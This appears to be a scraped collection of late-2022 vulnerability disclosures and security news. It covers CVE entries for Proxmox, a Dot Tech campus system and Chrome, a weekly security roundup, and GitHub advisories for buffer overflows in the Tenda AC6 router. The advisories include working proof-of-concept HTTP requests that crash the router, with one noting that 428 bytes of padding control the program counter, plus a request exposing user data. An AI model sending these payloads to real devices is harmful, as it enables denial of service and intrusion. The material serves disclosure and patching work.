A response-header CRLF injection vulnerability in the Proxmox Virtual Environment (PVE) and Proxmox Mail Gateway (PMG) web interface allows a remote attacker to set cookies for a victim's browser that are longer than the server expects, causing a client-side DoS. This affects Chromium-based browsers because they allow injection of response headers with %0d. This is fixed in pve-http-server 4.1-3.

CVE-2022-35507

A vulnerability, which was classified as problematic, has been found in Dot Tech Smart Campus System. Affected by this issue is some unknown functionality of the file /services/Card/findUser. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-214778 is the identifier assigned to this vulnerability.

Information leakage vulnerability exists in findUser, a smart campus system developed by Dot Tech

    GET /services/Card/findUser HTTP/1.1
    Host: TARGET:PORT
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=CF54BC1161620D928C2D258B97DEE39B
    Connection: close

CVE-2022-4280: Vulnerability/Information leakage vulnerability exists in findUser, a smart campus system developed by Dot Tech.md at main · Peanut886/Vulnerability

Plus: ICE accidentally doxes asylum seekers, Google fails to uphold a post-Roe promise, and LastPass suffers the second breach this year.

It was another busy week in security that saw big news about protests, surveillance, spyware, data breaches, and more. In the US, recent court filings detail how the FBI’s use of a controversial warrant yielded a trove of Google’s location data from thousands of devices in and around the Capitol on January 6. Meanwhile, in Iran, videos of antigovernment protests shared on social media highlight the importance of Twitter’s role in documenting human rights abuses and the consequences if the social media platform breaks.

On November 30, Google’s Threat Analysis Group moved to block a Spanish hacking framework that targets desktop computers. The exploitation framework, dubbed Heliconia, came to Google’s attention after a series of anonymous submissions to the Chrome bug reporting program. While Google, Microsoft, and Mozilla have all patched the Heliconia vulnerabilities, it’s a good reminder to keep your devices updated. ​​Here’s what you need to know about all the important security updates released in the past month.

Google researchers also found this week that the encryption keys phone-makers use to verify software on their devices are genuine—including the Android operating system itself—were stolen and used in malware.

Finally, we published part six of WIRED reporter Andy Greenberg’s series, “The Hunt for the Dark Web’s Biggest Kingpin,” which chronicles the downfall of AlphaBay, the world’s largest dark-web marketplace. Read the final installment here, and check out the full book from which the series was excerpted, _Tracers in the Dark: The Global Hunt for the Crime Lords of Cryptocurrency_, available now from wherever you buy books.

And there’s more. Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. 

A deadly fire in an apartment building sparked massive demonstrations in China where thousands of protestors in major cities have taken to the streets in defiance of the nation’s zero-Covid policy. The current wave of protests—the scale of which has not been seen in the country since the deadly 1989 Tiananmen Square protests—has been met with the massive surveillance and censorship apparatus that the state has been refining for decades. Authorities are using facial recognition, phone searches, and informants to identify, intimidate, and detain those who attended protests. 

The protests are stress-testing China’s sophisticated censorship apparatus, and experts say that the sheer volume of video clips has likely overwhelmed China’s armies of censors. Leaked documents from China’s Cyberspace Administration called the protests a “Level I Internet Emergency Response,” and authorities ordered ecommerce platforms to limit the availability of VPNs and firewall-circumventing routers. On Sunday, Chinese-language Twitter accounts spammed the service with links to escort services alongside city names where protests were occurring to drown out information about the protests. 

US Immigration and Customs Enforcement is in hot water after the agency mistakenly posted confidential data about thousands of asylum seekers during a routine update to their website. The data—which included the names, birthdates, nationalities, and detention locations of more than 6,000 individuals—was public for five hours before being taken down by the agency. The data disclosure could expose the immigrants affected by the breach to retaliation from the gangs and governments they had fled. 

The agency’s tech negligence comes as the Biden administration is dramatically expanding the use of technology to monitor immigrants during conditional release through smartphone apps and ankle monitors.

“The US government has an obligation to hold asylum seekers’ names and information in confidence so they don’t face retaliation,” a lawyer at Human Rights First, the organization that discovered the leak, told the _Los Angeles Times_. “ICE’s publication of confidential data is illegal and ethically unconscionable, a mistake that must never be repeated.”

New research shows that Google continues to retain sensitive location data from individuals seeking abortions in spite of promises the company made in July to purge this kind of data from its systems. Researchers with Accountable Tech, an advocacy group, conducted various experiments to analyze the data that Google stores about individuals looking for abortions online. They found that searches for directions to abortion clinics on Google Maps, as well as the routes taken to visit Planned Parenthood locations, were stored by Google for weeks. Google spokesperson Winnie King told the _Guardian_ that users “can turn Web & App Activity off at any time, delete all or part of their data manually, or choose to automatically delete the data on a rolling basis.”

Their findings contradict the pledges Google made after the US Supreme Court overturned _Roe v Wade_. “If our systems identify that someone has visited one of these places, we will delete these entries from Location History soon after they visit,” the company said in July. Five months later, Google appears to have not implemented this change.

LastPass, a popular password manager, is investigating a security incident after its systems were compromised for the second time this year. In a blog post about the incident, chief executive Karim Toubba said that an attacker gained access to their customers’ information using data stolen from LastPass’ systems in August, but did not specify what specific customer information was taken—although he stipulated that users’ stored passwords remained protected by the company’s encryption scheme. “We are working to understand the scope of the incident and identify what specific information has been accessed,” Toubba says. “In the meantime, we can confirm that LastPass products and services remain fully functional.”

China’s Police State Targets Zero-Covid Protesters

Search giant Google on Friday released an out-of-band security update to fix a new actively exploited zero-day flaw in its Chrome web browser.
The high-severity flaw, tracked as CVE-2022-4262, concerns a type confusion bug in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on November 29, 2022.
Type confusion

Threat Detection / Zero Day

Search giant Google on Friday released an out-of-band security update to fix a new actively exploited zero-day flaw in its Chrome web browser.

The high-severity flaw, tracked as CVE-2022-4262, concerns a type confusion bug in the V8 JavaScript engine. Clement Lecigne of Google's Threat Analysis Group (TAG) has been credited with reporting the issue on November 29, 2022.

Type confusion vulnerabilities could be weaponized by threat actors to perform out-of-bounds memory access, or lead to a crash and arbitrary code execution.

According to the NIST's National Vulnerability Database, the flaw permits a "remote attacker to potentially exploit heap corruption via a crafted HTML page."

Google acknowledged active exploitation of the vulnerability but stopped short of sharing additional specifics to prevent further abuse.

CVE-2022-4262 is the fourth actively exploited type confusion flaw that Google has addressed since the start of the year. It's also the ninth zero-day flaw in Chrome attackers have exploited in the wild in 2022 -

*   **CVE-2022-0609** - Use-after-free in Animation
*   **CVE-2022-1096** - Type confusion in V8
*   **CVE-2022-1364** - Type confusion in V8
*   **CVE-2022-2294** - Heap buffer overflow in WebRTC
*   **CVE-2022-2856** - Insufficient validation of untrusted input in Intents
*   **CVE-2022-3075** - Insufficient data validation in Mojo
*   **CVE-2022-3723** - Type confusion in V8
*   **CVE-2022-4135** - Heap buffer overflow in GPU

Users are recommended to upgrade to version 108.0.5359.94 for macOS and Linux and 108.0.5359.94/.95 for Windows to mitigate potential threats.

Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Rolls Out New Chrome Browser Update to Patch Yet Another Zero-Day Vulnerability

Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

**Chrome Releases**

Release updates from the Chrome team

CVE-2022-4262: Stable Channel Update for Desktop

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the time parameter in the fromSetSysTime function.

Permalink

Cannot retrieve contributors at this time

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the time parameter in the fromSetSysTime function.****Description**

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/SetSysTimeCfg request.

**Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address : https://www.tenda.com.cn/download/detail-2681.html
    

**Affected version**

**Vulnerability details**

This vulnerability lies in the /goform/SetSysTimeCfg page，The details are shown below:

**POC**

This POC can result in a Dos.

    POST /goform/SetSysTimeCfg HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 710
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=iqb1qw; bLanguage=cn
    Connection: close
    
    timeType=manual&time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa-

CVE-2022-45656: CVE-vulns/fromSetSysTime.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the fromSetIpMacBind function.

Permalink

Cannot retrieve contributors at this time

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the fromSetIpMacBind function.****Description**

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/SetIpMacBind request.

**Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address : https://www.tenda.com.cn/download/detail-2681.html
    

**Affected version**

**Vulnerability details**

This vulnerability lies in the /goform/SetIpMacBind page，The details are shown below:

**POC**

This POC can result in a Dos.

    POST /goform/SetIpMacBind HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 453
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=iqb1qw; bLanguage=cn
    Connection: close
    
    bindnum=1&list=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\n
    

Using A\*428 to padding, we can control PC register

CVE-2022-45657: CVE-vulns/fromSetIpMacBind.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the limitSpeed parameter in the formSetClientState function.

CVE-2022-45647: CVE-vulns/formSetClientState_limitSpeed.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the devName parameter in the formSetDeviceName function.

CVE-2022-45648: CVE-vulns/formSetDeviceName.md at main · Double-q1015/CVE-vulns

Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the firewallEn parameter in the formSetFirewallCfg function.

Permalink

Cannot retrieve contributors at this time

**Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the firewallEn parameter in the formSetFirewallCfg function.****Description**

Tenda Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the httpd module when handling /goform/SetFirewallCfg request.

**Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address : https://www.tenda.com.cn/download/detail-2681.html
    

**Affected version**

**Vulnerability details**

This vulnerability lies in the /goform/SetFirewallCfg page，The details are shown below:

**POC**

This POC can result in a Dos.

    POST /goform/SetFirewallCfg HTTP/1.1
    Host: 192.168.204.133
    Content-Length: 5147
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.204.133
    Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268&
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=iqb1qw; bLanguage=cn
    Connection: close
    
    firewallEn=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Tag

#chrome